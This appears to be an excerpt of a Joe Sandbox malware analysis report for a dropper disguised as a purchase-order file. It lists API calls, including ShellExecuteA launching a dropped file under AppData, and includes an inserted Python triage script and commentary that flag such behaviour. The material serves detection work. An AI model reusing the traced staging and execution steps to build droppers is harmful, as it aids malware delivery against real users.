                                                                      • Instruction ID: 6b9a29d885729d806435ba0af982d5db400a82278970f5f8cd94cba27a839736
                                                                      • Opcode Fuzzy Hash: cb8d7e7e292cd3f0bc6c1f59dcd71b3952a721e666c2518bc090900559d161d0
                                                                      • Instruction Fuzzy Hash: EDF0AD72904200AFEB11AF659E88EBB7A6DEB80344B10443AF505A61C0D6B849449A7A
                                                                      APIs
                                                                      • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes,?), ref: 00401E30
                                                                      Strings
                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes, xrefs: 00401E1B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: ExecuteShell
                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes
                                                                      • API String ID: 587946157-1484825760
                                                                      • Opcode ID: b0f1f290dab42d7627ac84af391824cda61e1d1b78d8d453e3c5aed2a9c0ee07
                                                                      • Instruction ID: 340d0feeeb8292155287dfb6c97f983a5cfd8bfca1fa3215745e1e0026b9813b
                                                                      • Opcode Fuzzy Hash: b0f1f290dab42d7627ac84af391824cda61e1d1b78d8d453e3c5aed2a9c0ee07
                                                                      • Instruction Fuzzy Hash: 6BF04632B041006FDB10ABB18D4AF5E27A8AB61319F20493BF141F70C2DAFC88419B18
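The block above is the one worth pivoting on: a ShellExecuteA call whose file argument is a dropped path under AppData\Roaming\Microsoft\Windows\Templates. As an added example (not code from the Joe Sandbox report), here is a small Python parser for the "APIs" bullet lines used throughout these blocks, with two triage rules an analyst would run over them. The sample lines are copied from the blocks on this page and embedded as a constructed string; the rule names, the EXEC_APIS and LOADER_APIS sets and the user-writable path pattern are the example's own assumptions, not anything the report defines.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: "APIs" bullet lines copied from the function blocks on this page.
# Two carry the "Part of subcall function" prefix and one (wsprintfA) has no argument
# list at all, so the parser has to cope with both shapes.
SAMPLE_LINES = r"""
  • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000002DB,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
• RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
• ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes,?), ref: 00401E30
• GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
• GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
  • Part of subcall function 00406037: wsprintfA.USER32 ref: 00406087
  • Part of subcall function 00406037: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040609B
• CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
"""

# One bullet line: optional subcall prefix, Api.Module, optional (args), "ref: <addr>".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[str]
    ref: str                 # address of the call site
    caller: Optional[str]    # subcall function address when the reference is inherited


def parse_api_refs(text: str) -> List[ApiRef]:
    """Parse Joe Sandbox 'APIs' bullet lines into structured call references."""
    refs = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        # The report does not quote arguments, so an argument that itself contains a
        # comma would be split here; none of the sample lines do.
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        refs.append(ApiRef(m.group("api"), m.group("module"), args,
                           m.group("ref"), m.group("caller")))
    return refs


# Assumed rule tables (example's own choices, not defined by the report).
EXEC_APIS = {"ShellExecuteA", "ShellExecuteW", "ShellExecuteExA", "ShellExecuteExW",
             "CreateProcessA", "CreateProcessW", "WinExec"}
LOADER_APIS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
               "GetModuleHandleA", "GetModuleHandleW"}
# Per-user writable locations a dropper typically stages its payload in.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\(?:Roaming|Local)\\", re.IGNORECASE)


def triage(refs: List[ApiRef]) -> List[Tuple[str, str, str]]:
    """Return (rule, call-site address, detail) findings for a list of references."""
    findings = []
    # Rule 1: a launch API given a file path inside a per-user writable directory.
    for r in refs:
        if r.api in EXEC_APIS:
            for a in r.args:
                if USER_WRITABLE.search(a):
                    findings.append(("exec_from_user_writable_path", r.ref, a))
    # Rule 2: GetProcAddress next to a module loader, i.e. imports resolved at run time.
    by_api = {r.api: r for r in refs}
    loaders = LOADER_APIS & set(by_api)
    if "GetProcAddress" in by_api and loaders:
        findings.append(("dynamic_api_resolution", by_api["GetProcAddress"].ref,
                         "GetProcAddress paired with " + ", ".join(sorted(loaders))))
    return findings


if __name__ == "__main__":
    for rule, ref, detail in triage(parse_api_refs(SAMPLE_LINES)):
        print(f"{rule:30} @ {ref}: {detail}")
```

Weight the two findings differently. The GetModuleHandleA/GetProcAddress pair whose subcall builds a path with GetSystemDirectoryA and wsprintfA before LoadLibraryExA(…, 0, 0x8) is consistent with the NSIS installer stub rather than with the GuLoader stage itself (the nsq8002.tmp path in the RegCloseKey arguments follows the NSIS temporary-directory naming pattern), so on its own it says little. The ShellExecuteA call on a file under AppData\Roaming\Microsoft\Windows\Templates is the one to correlate with the dropped-file list and the process tree elsewhere in the report.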
                                                                      APIs
                                                                        • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000002DB,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3677997916-0
                                                                      • Opcode ID: 5036ecff7da7e931cef0e4d9af925887b92852862d1d3796e4000a238184e6f1
                                                                      • Instruction ID: 3b61e3a0dd356b8eb8c6217664be55b6a4c5c12d426b24930886ed9b9a2887e1
                                                                      • Opcode Fuzzy Hash: 5036ecff7da7e931cef0e4d9af925887b92852862d1d3796e4000a238184e6f1
                                                                      • Instruction Fuzzy Hash: 5911A771905205EFDF14DF64CA889AEBBB4EF11348F20443FE141B62C0D2B84A45DB5A
                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
                                                                      • Instruction ID: 00097469377630013da62b9f7c31fbdee85021c234e60ac5accdaffcc3ed26dc
                                                                      • Opcode Fuzzy Hash: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
                                                                      • Instruction Fuzzy Hash: BE01F4316242209BF7194B389C04B6A3698E751354F10813BF811F62F1D678DC028B4D
                                                                      APIs
                                                                        • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000002DB,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                      • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402327
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CloseDeleteOpenValue
                                                                      • String ID:
                                                                      • API String ID: 849931509-0
                                                                      • Opcode ID: 48c6a4f1ec7a86bc1051c3bdbeac554186010e92678d5b1d819c5a0f771793f2
                                                                      • Instruction ID: 97ae11083f28a0faafd94fb7fe42009bced1e39793468f635283aee611ee1e77
                                                                      • Opcode Fuzzy Hash: 48c6a4f1ec7a86bc1051c3bdbeac554186010e92678d5b1d819c5a0f771793f2
                                                                      • Instruction Fuzzy Hash: A2F04433A00110AFEB10BBA48A4EAAE7269AB50344F14443BF201B61C1DABD4D12966D
                                                                      APIs
                                                                      • ShowWindow.USER32(00010432), ref: 00401579
                                                                      • ShowWindow.USER32(0001042C), ref: 0040158E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: 58339daa48f2abfaa16ef55595ad2450e584a2864855a69756b41114902e3615
                                                                      • Instruction ID: 8b304e13c4ff4e58b2746d459b27b343ece49c0a97bab20a5a043a2c5b6af2c1
                                                                      • Opcode Fuzzy Hash: 58339daa48f2abfaa16ef55595ad2450e584a2864855a69756b41114902e3615
                                                                      • Instruction Fuzzy Hash: DEF0E577A082905FEB15CB64EDC086D7BF2EB8631075445BBD101A3691C2785C08C728
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                        • Part of subcall function 00406037: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040604E
                                                                        • Part of subcall function 00406037: wsprintfA.USER32 ref: 00406087
                                                                        • Part of subcall function 00406037: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040609B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2547128583-0
                                                                      • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                      • Instruction ID: 3e97459997e7f7d7039c0cd31b40a13ca7cd82e20333033f2d5c91e802436a08
                                                                      • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                      • Instruction Fuzzy Hash: 9DE08632644121AAD32097749E0493B72ACAA84751302093EF506F2180D7389C21A669
APIs
• GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,80000000,00000003), ref: 00405983
• CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
Memory Dump Source
• Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
• Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
• Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
• Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
APIs
• CreateDirectoryA.KERNELBASE(?,00000000,004030DF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 0040546E
• GetLastError.KERNEL32 ref: 0040547C
Memory Dump Source
• Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
• Instruction ID: c55d8aa437131a95a01de78b0052dcd3d9cc3f447ee629d771dafcce0f52932c
• Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
• Instruction Fuzzy Hash: F5C04C30719601EAD6205B609E08B5B7D54AB54742F1045756546E10F0D6749451D92E
APIs
• VirtualAlloc.KERNELBASE(00000000), ref: 100028A7
• GetLastError.KERNEL32 ref: 100029AE
Memory Dump Source
• Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
Similarity
• API ID: AllocErrorLastVirtual
• String ID:
• API String ID: 497505419-0
• Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
• Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
• Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
• Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
Memory Dump Source
• Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
Similarity
• API ID: wsprintf
• String ID:
• API String ID: 2111968516-0
• Opcode ID: 2b3f0152387d06df6eaf096f135fad1e6c25d68e51a67a505a4e16ce5121cf03
• Instruction ID: 2ad6ade0dd87bb00519d913a8aa863536615c58d60cd2f1651ee4e1b5922b607
• Opcode Fuzzy Hash: 2b3f0152387d06df6eaf096f135fad1e6c25d68e51a67a505a4e16ce5121cf03
• Instruction Fuzzy Hash: D321DB70C04295BEDF318B584A985AF7B749B11314F1484BBE891B62D1C1BD8A85EB1D
APIs
• SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402630
  • Part of subcall function 00405C6A: wsprintfA.USER32 ref: 00405C77
Memory Dump Source
• Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
Similarity
• API ID: FilePointerwsprintf
• String ID:
• API String ID: 327478801-0
• Opcode ID: 605c8d6a649ef785eb1d6a94470a00a99215b591ffdd9e56fcea621c1e02c6b1
• Instruction ID: 8aac78d75a064c4630454a8a93e19dff4664e4603579630d9101515f905a40da
• Opcode Fuzzy Hash: 605c8d6a649ef785eb1d6a94470a00a99215b591ffdd9e56fcea621c1e02c6b1
• Instruction Fuzzy Hash: 56E01A76A05640AAE701B7A5AE89CBE636ADB50318B20853BF601B00C1C6BD89059A3E
APIs
• RegOpenKeyExA.KERNELBASE(00000000,000002DB,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
Memory Dump Source
• Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
